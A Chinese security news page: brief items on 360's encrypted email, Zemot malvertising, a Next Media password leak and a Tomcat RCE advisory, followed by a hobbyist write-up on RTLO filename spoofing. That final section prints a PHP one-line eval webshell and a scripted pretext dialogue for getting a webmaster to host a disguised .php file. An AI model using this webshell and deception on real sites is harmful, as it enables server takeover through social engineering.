分类 展示类 下的文章

360发布加密邮系统:支持163和QQ邮箱等 10月上线

9月24日消息,中国互联网安全大会(ISC)在京召开,360发布了加密邮系统,该系统支持PC和移动平台,兼容目前主流的邮件服务。为有效防止邮件泄密,用户只需输入“安全密码”即可直接对邮件传输、存储、接收进行高强度加密。该系统支持163、126、QQ等主流邮箱服务,将于10月上线。

25_1k8DwsveS

互联网上面每天来往10多亿封邮件。一封邮件从发送到接收,要经过网络、服务器、终端等多个通道,其中大部分邮件是以明文形式传输和存储,黑客秩要破解邮箱密码或入侵邮箱服务器就能够窃取到该邮箱内所有邮箱内容。

2013年曝光的斯诺登事件,披露了每过NSA窃听多国征服和企业高层邮件的信息,引发了国际社会的广泛关注。2014年,263的邮件服务服务器遭黑客入侵,导致1.6万企业的邮箱被窃取。

针对这类安全问题,360推出360加密邮系统。该加密系统基于国家密码管理局颁发的SM9加密方式,能够为每个邮箱设置单独的“安全密码”。在邮箱发送时选择“加密发送”即可自动为邮件加密,而邮件接受者也必须凭借“安全密码”才能解封查看该邮件内容。

360加密邮产品经理刘义平表示,配置“安全密码”的邮件在传输和存储过程中均为高度加密状态。“无论是邮箱密码遭破解,还是电脑终端遭木马病毒攻击,甚至是黑客入侵了邮箱服务器都无法解封这些加密邮件。”

目前,360加密邮支持PC、Android、iOS等平台。支持163、126、QQ等主流邮箱服务。将于10月正式上线。

广告你敢点么?黑客利用Google广告大量传播恶意软件

黑客正在利用Google的DoubleClick和流行的Zedo广告代理来提供恶意广告,数百万的用户计算机上被安装了恶意软件。

由安全厂商Malwarebytes的研究人员最近发布的报告中表示,黑客正在利用一些网站,包括以色列的Times网站和Last.fm音乐网站上的广告来试图传播恶意软件Zemot。

恶意广告没有使用任何新式技术,Malwarebytes的高级研究员Jerome Segura在公司的博客中称:“很少见到大规模的此种类攻击,直到我们的蜜罐捕捉到一些流行网站做的标记,这时候,我们才认为一定有些事情正在发生”。

自八月下旬开始,到目前为止,可能数百万台电脑已被Zemot攻击。

恶意广告会引导用户下载Nuclear exploit 套件,并会在受害者的操作系统上运行含有漏洞的Adobe Flash播放器或Internet Explorer。如果成功运行这两种含有漏洞的软件后,Zemot就会被下载,并会进一步向远程服务器发出请求,下载更多的恶意软件。

Zemot恶意软件是在本月初由微软确定的,微软称:“Zemot不仅和Nuclear exploit工具包配合使用,并且和Magnitude工具包、恶意邮件机器人Kuluoz一起使用。该恶意软件重点运行在Windows XP的计算机上,它也能感染32位或64位的多个操作系统。与很多恶意软件相同的是,Zemot可以很容易的绕过安全软件的行为检查。

Google已经发表声明,相关团队也已经关闭了受到重定向代码攻击的服务器,并禁止了能够传播恶意软件的广告。

[参考信息来源THN,译/FreeBuf小编嘎巴,转载请注明来自FreeBuf.COM]

香港壹传媒步Gmail后尘,数十万明文密码遭泄露

周二在国外某黑客论坛发现,香港媒体大亨壹传媒(nextmedia.com)数十万用户账号信息泄露,包括邮箱,明文密码和手机号在内的账户信息被发布到了论坛上(https://evilzone.org/news-and-announcements/nextmedia-data-leakage)。发布这些账号信息的注册用户表示,用户数据超过50万,更新时间截至2014年9月,验证密码正确性高达80%以上。截止目前为止壹传媒尚未对此事发表任何声明,网站也未提示用户更改密码。

根据发布网站全球排名的Alexa提供的排名信息,该网站目前全球排名1654,香港地区排名第10。

同前段时间炒得沸沸扬扬的gmail数据泄露相似,发布这些账号信息的注册用户也搭建了相关的数据查询网站。如有你有在壹传媒网站注册
用户,想要查询你的账号是不是在泄露的名单里,可以登录该网站,输入自己的邮箱账号即可。为了保险起见,不管你是否在这个名单上,还是换掉你的密码吧。用
户可以通过一个名为“Next Media Has Been Pwned ,Is your password
leaked?”的网站(http://www.pwnnextmedia.com)查询自己的用户数据是否被泄露。

背景:
壹传媒有限公司简称壹传媒;英语:Next Media Ltd.;港交所:0282)是一家中文传媒企业,成立于1990年,于2000年2月16日透过百乐门出版集团有限公司换取于香港交易所主板上市。于1999年以前主要从事印刷及分色制版服务及杂志出版,其业务版图横跨香港与台湾,在港台两地出版多份报纸、杂志,曾经在台湾经营电视台——壹电视,及多媒体平台网络协定电视壹网乐。其他业务包括广告、印刷及分色制版服务。壹传媒旗下的刊物大多有在互联网上提供完整内容并在互联网刊登广告,公司在香港注册,董事会主席为黎智英,行政总裁为张嘉声

Apache警告:Tomcat存在远程代码执行漏洞

 

开源WEB容器–Apache+Tomcat老版本很容易受到远程代码执行的攻击。Mark Thomas,一位长期致力于Apache+Tomcat的工作者称

“在某种情况下,用户可以上传恶意JSP文件到Tomcat服务器上运行,然后执行命令。JSP的后门可以用来在服务器上任意执行命令。”

Thomas今日发出警告称,Tomcat版本7.0.0和7.3.9在发布补丁之前是脆弱的。利用漏洞(CVE-2014-4444)可执行远程代码执行攻击。上周VMware安全工程部,通信与响应小组(vSECR)的Pierre Ernst挖掘出了这个漏洞。

但官方同时也表示,这个漏洞谈起来容易,但实施攻击有难度。攻击者必须达成的一定条件——其中包括:Oracle Java 1.7.0 update 25,或者Tomcat中的更早的脆弱版本。值得一提的是,该系统的文件路径必须保证可写,而JMX环境的自定义侦听器必须配置且绑定到本地localhost以外的地址。正因为这些限制,Tomcat的安全团队把该漏洞从严重降级为重要,严重程度往往与远程执行漏洞相关。

Apache团队鼓励用户升级到Tomcat7.0.40,或者将他们的Oracle Java升级到1.7.0来减轻危害,要不然就只能等到以后再修补它了。

[参考信息来源threatpost.com,译/FreeBuf实习小编dawner,转载请注明来自FreeBuf.COM]

浅谈RTLO技术

我在FreeBuf上到了 [APT攻击]趋势科技捕获一次APT攻击活动 这篇文章,然后就自己去探探究竟,文章地址在下面

传送门

RLO控制符是Unicode控制符的一种,使得字符显示从右至左的顺序,攻击者可以利用RTLO技术来达到欺骗目标,从而使得可执行文件的运行

首先Windows系统在解析文件名时,当遇到unicode控制符时,会改变文件名的显示方式,利用这一特性,可以将exe、scr、com等可执行文件伪装成doc、jpg、txt、ppt等

例如:我首先创建一个bat文件,命名为txt.bat,里面内容写为ping baidu.com,下面就是重点了,我们进行重命名,选择“插入unicode控制字符”,然后就到了这个菜单栏,我们选择RLO,输入txt.bat
<ignore_js_op> <ignore_js_op>

我们可以看到此时文件名已经显示为tab.txt
<ignore_js_op> <ignore_js_op>

不过我们看到它是一个window批处理文件(bat),可以正常执行指令

当然文件的图标方面也是可以修改的,这样可以显得文件的确是一个txt文档,从而诱使目标打开,增加成功几率

简单的一笔

给自己做个记录

 科学研究话题:HTML文件是否可以变为WEBSHELL

测试环境:Linux+Apache+Php
Linux+Nginx+Php

<ignore_js_op>
<ignore_js_op>

从上面2幅图可以看到HTML是没有办法充当一句话的,但是现在我们需要的就是把HTML变为PHP文件,这个可能实现吗?完全有可能!!!这里需要运用到RTLO技术,来进行欺骗,我个人认为目前这种方法适用于社会工程学攻击方面比较得体。

<ignore_js_op>

可以看到运用RTLO技术,我们已经把html.php变为了php.html,这样我们可以用于欺骗。如何欺骗?下面是虚构的一篇对话!当然方法不唯一!

===>攻击者事先把恶意代码放入HTML中(<?php @eval($_POST['sys']);?>)

→攻击者:你是xxx的站长吗?我有一个小广告想挂在你的网站上面。
→站长:嗯,你好,我是xxx的站长。
→攻击者:站长,是这样的,我想先把一个HTML放进去,看看效果,如果效果不错,就可以付款,然后正式开始合作。
→站长:嗯,行,那你把HTML文件传过来吧。
→站长: www.xxx.com/php.html,你看看去吧,如果效果不错,我就去放置了。

其实这个时候php.html文件早以不存在了,而在linux下面它会这样显示?lmth.php,这样它就变为了一个可执行文件php,从而攻击者可以获取到webshell。
为了还原现场,我把已经运用RTLO技术的php.html上传到服务器,由于linux没有unicode控制符这么一说,所以linux会还原为lmth.php(这个为windows下运用RTLO输入时的场景)

<ignore_js_op>

攻击者从而就可以获取到webshell了,www.xxx.com/%3flmth.php。

<ignore_js_op>